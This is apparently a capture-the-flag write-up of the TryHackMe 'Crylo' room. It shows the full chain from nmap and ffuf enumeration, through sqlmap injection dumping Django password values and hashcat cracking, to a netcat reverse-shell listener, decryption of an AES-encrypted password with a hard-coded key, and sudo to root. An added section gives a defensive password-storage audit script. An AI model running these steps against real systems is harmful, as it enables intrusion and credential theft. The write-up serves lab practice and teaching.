# Crylo

<figure><img src="https://1261483422-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTAjoMGhyi4qD4wiYqHYf%2Fuploads%2Fnmjbj9Gyaf6YipOD8zs0%2FCrylo.png?alt=media&#x26;token=db566556-b273-45a8-89d4-a497151b5bce" alt="" width="375"><figcaption></figcaption></figure>

<p align="center"><a href="https://tryhackme.com/room/crylo4a">https://tryhackme.com/room/crylo4a</a></p>

***

## Enumeration

```bash
sudo nmap -p- -sS --min-rate 5000 -Pn -n -vv -oA nmap/Crylo 10.64.156.228

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 62
80/tcp open  http    syn-ack ttl 62
```

```bash
nmap -p 22,80 -sCV -oA nmap/openPorts 10.64.156.228

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 64:da:b0:5c:3c:51:1a:55:18:10:30:93:7c:89:38:97 (RSA)
|   256 1f:32:83:bd:4b:47:89:03:a4:f8:93:c8:22:a6:36:b9 (ECDSA)
|_  256 05:ac:13:bb:4c:39:00:5a:e0:a3:fc:68:33:24:b7:c3 (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Spicyo
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

```bash
ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/DirBuster-2007_directory-list-2.3-medium.txt -u http://10.64.156.228/FUZZ -t 100 -ic -c

login                   [Status: 200, Size: 13151, Words: 5693, Lines: 314, Duration: 187ms]
about                   [Status: 200, Size: 10720, Words: 4046, Lines: 260, Duration: 236ms]
contact                 [Status: 200, Size: 8858, Words: 3425, Lines: 214, Duration: 245ms]
blog                    [Status: 200, Size: 11402, Words: 4155, Lines: 278, Duration: 326ms]
debug                   [Status: 403, Size: 122, Words: 6, Lines: 11, Duration: 184ms]
recipe                  [Status: 200, Size: 13914, Words: 5897, Lines: 355, Duration: 172ms]
```

<http://10.64.156.228/login>

<figure><img src="https://1261483422-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTAjoMGhyi4qD4wiYqHYf%2Fuploads%2FXb728X9sbm2BYKa3pPMl%2FScreenshot%202026-03-17%20142029.png?alt=media&#x26;token=b62a4c45-dbb7-4566-888c-3f2623f6b5ba" alt=""><figcaption></figcaption></figure>

## Exploitation

### SQL injection

<figure><img src="https://1261483422-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTAjoMGhyi4qD4wiYqHYf%2Fuploads%2FuPHgQcqKeAXjA10Ma3TO%2FScreenshot%202026-03-17%20142109.png?alt=media&#x26;token=3b05efc1-c2e9-40c0-85df-ac583847f8ca" alt=""><figcaption></figcaption></figure>

```bash
sqlmap -r req -p username --batch --fingerprint

[16:24:16] [INFO] the back-end DBMS is MySQL
[16:24:16] [INFO] executing MySQL comment injection fingerprint
web server operating system: Linux Ubuntu
web application technology: Nginx 1.18.0
back-end DBMS: active fingerprint: MySQL >= 8.0.0
               comment injection fingerprint: MySQL 8.0.41
```

```bash
sqlmap -r req -p username --batch --dbs

[*] food
[*] information_schema
[*] mysql
[*] performance_schema
[*] sys
```

```bash
sqlmap -r req -p username --batch --current-db

current database: 'food'
```

```bash
sqlmap -r req -p username --batch --tables -D food

+----------------------------+
| accounts_pin               |
| accounts_pintoken          |
| accounts_upload            |
| auth_group                 |
| auth_group_permissions     |
| auth_permission            |
| auth_user                  |
| auth_user_groups           |
| auth_user_user_permissions |
| django_admin_log           |
| django_content_type        |
| django_migrations          |
| django_session             |
+----------------------------+
```

```bash
sqlmap -r req -p username --batch --columns -D food -T auth_user

+--------------+--------------+
| Column       | Type         |
+--------------+--------------+
| date_joined  | datetime(6)  |
| email        | varchar(254) |
| first_name   | varchar(150) |
| id           | int          |
| is_active    | tinyint(1)   |
| is_staff     | tinyint(1)   |
| is_superuser | tinyint(1)   |
| last_login   | datetime(6)  |
| last_name    | varchar(150) |
| password     | varchar(128) |
| username     | varchar(150) |
+--------------+--------------+
```

```bash
sqlmap -r req -p username --batch --dump -D food -T auth_user -C username,password

+----------+------------------------------------------------------------------------------------------+
| username | password                                                                                 |
+----------+------------------------------------------------------------------------------------------+
| admin    | pbkdf2_sha256$260000$HxnWVrw647R53GeEUksjW5$SggM3ZAh86qRZtnn0VbWOSmHWhckfVvIsMG+jTZstpE= |
| anof     | VH6Hj4+eQn5uYGVAxy8Ht7pkVO9oePUpELDdiXFq1V0=                                             |
+----------+------------------------------------------------------------------------------------------+
```

```bash
echo 'pbkdf2_sha256$260000$HxnWVrw647R53GeEUksjW5$SggM3ZAh86qRZtnn0VbWOSmHWhckfVvIsMG+jTZstpE=' > admin.hash
```

```bash
hashcat --identify admin.hash

The following hash-mode match the structure of your input hash:

      # | Name                                                       | Category
  ======+============================================================+======================================
  10000 | Django (PBKDF2-SHA256)                                     | Framework
```

```bash
hashcat -m 10000 admin.hash /usr/share/wordlists/seclists/Passwords/Leaked-Databases/rockyou.txt

pbkdf2_sha256$260000$HxnWVrw647R53GeEUksjW5$SggM3ZAh86qRZtnn0VbWOSmHWhckfVvIsMG+jTZstpE=:trigger
```

<http://10.65.191.137/login>

<figure><img src="https://1261483422-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTAjoMGhyi4qD4wiYqHYf%2Fuploads%2FwZdj1tvm3aUxu02efmIC%2FScreenshot%202026-03-17%20194359.png?alt=media&#x26;token=9c261c96-b9f7-4390-ab77-9dce3c737e35" alt=""><figcaption></figcaption></figure>

<figure><img src="https://1261483422-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTAjoMGhyi4qD4wiYqHYf%2Fuploads%2FyyAsRvwtdSHQiPEhMu23%2FScreenshot%202026-03-17%20194649.png?alt=media&#x26;token=147bb1f3-f3c6-4a4b-bd95-7d9cc5744811" alt=""><figcaption></figcaption></figure>

<figure><img src="https://1261483422-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTAjoMGhyi4qD4wiYqHYf%2Fuploads%2FmkZ1aOklH5PUP4EFnpjh%2FScreenshot%202026-03-17%20194806.png?alt=media&#x26;token=72306462-6d8a-40c7-90e0-5bd3e6a95115" alt=""><figcaption></figcaption></figure>

<figure><img src="https://1261483422-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTAjoMGhyi4qD4wiYqHYf%2Fuploads%2FoNdx8iN98h5qEINoh6C8%2FScreenshot%202026-03-17%20195007.png?alt=media&#x26;token=40221a9b-aa77-4128-aeda-27e26fb2d110" alt=""><figcaption></figcaption></figure>

<figure><img src="https://1261483422-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTAjoMGhyi4qD4wiYqHYf%2Fuploads%2FChwL1OlqmDUXIgqUmaAZ%2FScreenshot%202026-03-17%20195118.png?alt=media&#x26;token=ff520a72-c8f2-4a52-a5bd-ba7c95432720" alt=""><figcaption></figcaption></figure>

<figure><img src="https://1261483422-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTAjoMGhyi4qD4wiYqHYf%2Fuploads%2FITw3z7QvcUGymnizoXha%2FScreenshot%202026-03-17%20195201.png?alt=media&#x26;token=b8117056-176a-42f9-bd2e-dbb4446fa4c7" alt=""><figcaption></figcaption></figure>

<figure><img src="https://1261483422-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTAjoMGhyi4qD4wiYqHYf%2Fuploads%2FDxnvKnT7s4OWXdpbldud%2FScreenshot%202026-03-17%20195238.png?alt=media&#x26;token=eda4b993-e29a-4cf0-83d4-a8f52f91c4fe" alt=""><figcaption></figcaption></figure>

<http://10.65.191.137/debug>

<figure><img src="https://1261483422-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTAjoMGhyi4qD4wiYqHYf%2Fuploads%2FMO2v5koOkc3HLBqe2aNU%2FScreenshot%202026-03-17%20195557.png?alt=media&#x26;token=e9c727ad-82f6-4551-923f-faa5da5fd73b" alt=""><figcaption></figcaption></figure>

<figure><img src="https://1261483422-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTAjoMGhyi4qD4wiYqHYf%2Fuploads%2F5Uhm36Ph7CT4nRDXWHXY%2FScreenshot%202026-03-17%20195647.png?alt=media&#x26;token=8d62694f-25bb-4e43-a536-041cc3f39444" alt=""><figcaption></figcaption></figure>

<kbd>Right click</kbd> and select `Open response in browser`

<figure><img src="https://1261483422-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTAjoMGhyi4qD4wiYqHYf%2Fuploads%2FtLIQGq6SeFV949B4wfvh%2FScreenshot%202026-03-17%20195823.png?alt=media&#x26;token=4a5d6994-ea73-42e0-aaa4-1ed76eeab6f1" alt=""><figcaption></figcaption></figure>

<figure><img src="https://1261483422-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTAjoMGhyi4qD4wiYqHYf%2Fuploads%2FlT60ndBFrjmZE0pvNQzX%2FScreenshot%202026-03-17%20200358.png?alt=media&#x26;token=b620c307-353b-4d62-904a-93bbfed58c7f" alt=""><figcaption></figcaption></figure>

```bash
nc -lnvp 1111
Listening on 0.0.0.0 1111
```

<figure><img src="https://1261483422-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTAjoMGhyi4qD4wiYqHYf%2Fuploads%2FG2V5tUsOmfeMq1CSTBeX%2FScreenshot%202026-03-17%20200601.png?alt=media&#x26;token=3d864b3f-bd0d-4e93-882f-1ddcbd5a6507" alt=""><figcaption></figcaption></figure>

```bash
nc -lnvp 1111
Listening on 0.0.0.0 1111
Connection received on 10.65.191.137 40902
bash: cannot set terminal process group (1354): Inappropriate ioctl for device
bash: no job control in this shell
crylo@ip-10-65-191-137:~/Food/food$
```

[interactive-shell](https://estebanzarate.gitbook.io/hackache/linux/interactive-shell "mention")

```bash
crylo@ip-10-65-191-137:~/Food/food$ cd /home/crylo/
crylo@ip-10-65-191-137:~$ ls
Food  user.txt
crylo@ip-10-65-191-137:~$ cat user.txt 
```

## User flag

{% hint style="info" %}
fa3\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*59d
{% endhint %}

## Lateral movement

```bash
crylo@ip-10-65-191-137:~$ cd Food/
crylo@ip-10-65-191-137:~/Food$ ls
'~.bash_profile'   env   food   requirements.txt   static   ven   venv   virtual
crylo@ip-10-65-191-137:~/Food$ cd food/
crylo@ip-10-65-191-137:~/Food/food$ ls
accounts  assets  food  manage.py  media  nano  __pycache__  static  templates
crylo@ip-10-65-191-137:~/Food/food$ cd accounts/
crylo@ip-10-65-191-137:~/Food/food/accounts$ ls
admin.py  apps.py  enc.py  forms.py  __init__.py  migrations  models.py  __pycache__  tests.py  urls.py  views.py
```

```bash
crylo@ip-10-65-191-137:~/Food/food/accounts$ cat enc.py

# from Crypto.Cipher import AES
# from Crypto.Util.Padding import pad
from base64 import b64encode, b64decode
import base64


# key = '/I02fMuSSvnouuu+/vyyD7NuSEVDB/0gte/z50dM0b4='
# data = 'hello world!'

# cipher = AES.new(b64decode(key), AES.MODE_CBC, iv=b'0123456789abcdef')
# padded_data = pad(data.encode(), cipher.block_size)
# ciphertext = cipher.encrypt(padded_data)
# print(b64encode(ciphertext))


#from Crypto.Cipher import AES
#from pkcs7 import PKCS7Encoder

#key = "8080808080808080".encode()
#mode = AES.MODE_CBC
#iv = "8080808080808080".encode()
#encoder = PKCS7Encoder()


# encryptor = AES.new(key, mode, iv)
# text = "Test@123"
# pad_text = encoder.encode(text)
# cipher = encryptor.encrypt(pad_text)
# enc_cipher = base64.b64encode(cipher)

# secret_text = '{"success":"false", "reason":"User or Password is invalid"}'
# #key = 'A16ByteKey......'
# mode = AES.MODE_CBC
# #iv = '\x00' * 16

# encoder = PKCS7Encoder()
# padded_text = encoder.encode(secret_text)

# e = AES.new(key, mode, iv)
# cipher_text = e.encrypt(padded_text.encode())

# output = (base64.b64encode(cipher_text))
# print(output.decode("utf-8"))
# #print("56iPf4PPRmHLusqyKpf7QQ==")


from Crypto.Util.Padding import pad, unpad
from Crypto.Cipher import AES
from Crypto.Random import get_random_bytes
data = b'toor'   # 9 bytes
key = b'\xc9;\xd4b\xce\xc15\x19;\x00Z^Nw\xafp\x10\xce/r\x0c\xf1\x1c&\x1c\x12a\xd9&b"\xc3'
iv = b'!6\x0b\xc7Xg@\xcc\xe3KY\xcfN\x9b\x81\x91'
cipher1 = AES.new(key, AES.MODE_CBC, iv)
ct = cipher1.encrypt(pad(data, 16))

print(ct)

#cipher2 = AES.new(key, AES.MODE_CBC, iv)
#pt = unpad(cipher2.decrypt(b'\x9f\xc9P\xff\xb3Z\x94\x84\x8a\xeb1\xa2/\xba\x8d\xa5'), 16)
#print(pt)
#assert(data == pt)
```

```python
from base64 import b64decode
from Crypto.Util.Padding import unpad
from Crypto.Cipher import AES

# Key and IV are the values hard-coded in accounts/enc.py
key = b'\xc9;\xd4b\xce\xc15\x19;\x00Z^Nw\xafp\x10\xce/r\x0c\xf1\x1c&\x1c\x12a\xd9&b"\xc3'
iv  = b'!6\x0b\xc7Xg@\xcc\xe3KY\xcfN\x9b\x81\x91'

# anof's password value from the auth_user dump: base64-encoded AES-CBC ciphertext
ciphertext = b64decode("VH6Hj4+eQn5uYGVAxy8Ht7pkVO9oePUpELDdiXFq1V0=")
cipher = AES.new(key, AES.MODE_CBC, iv)
# Decrypt and strip the PKCS#7 padding (16-byte block size)
plaintext = unpad(cipher.decrypt(ciphertext), 16)

print(plaintext.decode())
```

```bash
python3 decode.py
@Pass123@666666666
```
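The `auth_user` dump holds two kinds of `password` value: a Django `pbkdf2_sha256$...` hash and a bare base64 string that decrypts with the key and IV hard-coded in `enc.py`. The following is an added example, not code from the room or from this writeup: an audit check that flags stored values that are not in a one-way hasher format and verifies PBKDF2 values with the standard library. The function names and sample rows are constructed for illustration.

```python
import base64
import hashlib
import hmac

# Identifiers Django's one-way hashers write before the first '$'.
DJANGO_HASHERS = {"pbkdf2_sha256", "pbkdf2_sha1", "argon2", "bcrypt_sha256", "bcrypt", "scrypt"}


def make_pbkdf2(password, salt, iterations):
    """Encode a password in Django's pbkdf2_sha256$iterations$salt$hash form."""
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt.encode(), iterations)
    return "pbkdf2_sha256$%d$%s$%s" % (iterations, salt, base64.b64encode(dk).decode())


def verify_pbkdf2(password, stored):
    """Recompute with the stored salt and iteration count; compare in constant time."""
    algorithm, iterations, salt, _ = stored.split("$", 3)
    if algorithm != "pbkdf2_sha256":
        raise ValueError("not a pbkdf2_sha256 value")
    return hmac.compare_digest(make_pbkdf2(password, salt, int(iterations)), stored)


def classify(stored):
    """Describe how one password column value is stored."""
    algorithm, sep, _ = stored.partition("$")
    if stored.startswith("!"):
        return "unusable"  # Django's marker for a disabled password
    if sep and algorithm in DJANGO_HASHERS:
        return "one-way hash"
    try:
        raw = base64.b64decode(stored, validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return "unknown"
    if raw and len(raw) % 16 == 0:  # whole AES blocks
        return "possible reversible ciphertext"
    return "unknown"


def audit(rows):
    """Return the usernames whose value is not a recognised one-way hash."""
    return [u for u, stored in rows if classify(stored) not in ("one-way hash", "unusable")]


# Constructed sample rows: one PBKDF2 hash, one base64 blob of two AES blocks.
SAMPLE = [("alice", make_pbkdf2("correct horse", "constructedsalt", 1000)),
          ("bob", base64.b64encode(bytes(32)).decode())]

if __name__ == "__main__":
    print(audit(SAMPLE))
```

A value flagged as possible ciphertext is only as safe as the key that encrypted it, so anyone who can read both the database and the application source can recover the password, whereas the PBKDF2 value has to be guessed one candidate at a time.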

```bash
crylo@ip-10-65-191-137:~/Food/food$ su anof
Password: 
```

## Privilege escalation

```bash
anof@ip-10-65-191-137:/home/crylo/Food/food$ sudo -l
[sudo] password for anof: 
Matching Defaults entries for anof on ip-10-65-191-137:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User anof may run the following commands on ip-10-65-191-137:
    (ALL : ALL) ALL
anof@ip-10-65-191-137:/home/crylo/Food/food$ sudo su root
root@ip-10-65-191-137:/home/crylo/Food/food# cd
root@ip-10-65-191-137:~# ls
flag.txt  snap
root@ip-10-65-191-137:~# cat flag.txt
```

## Root flag

{% hint style="success" %}
201\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*c7e
{% endhint %}
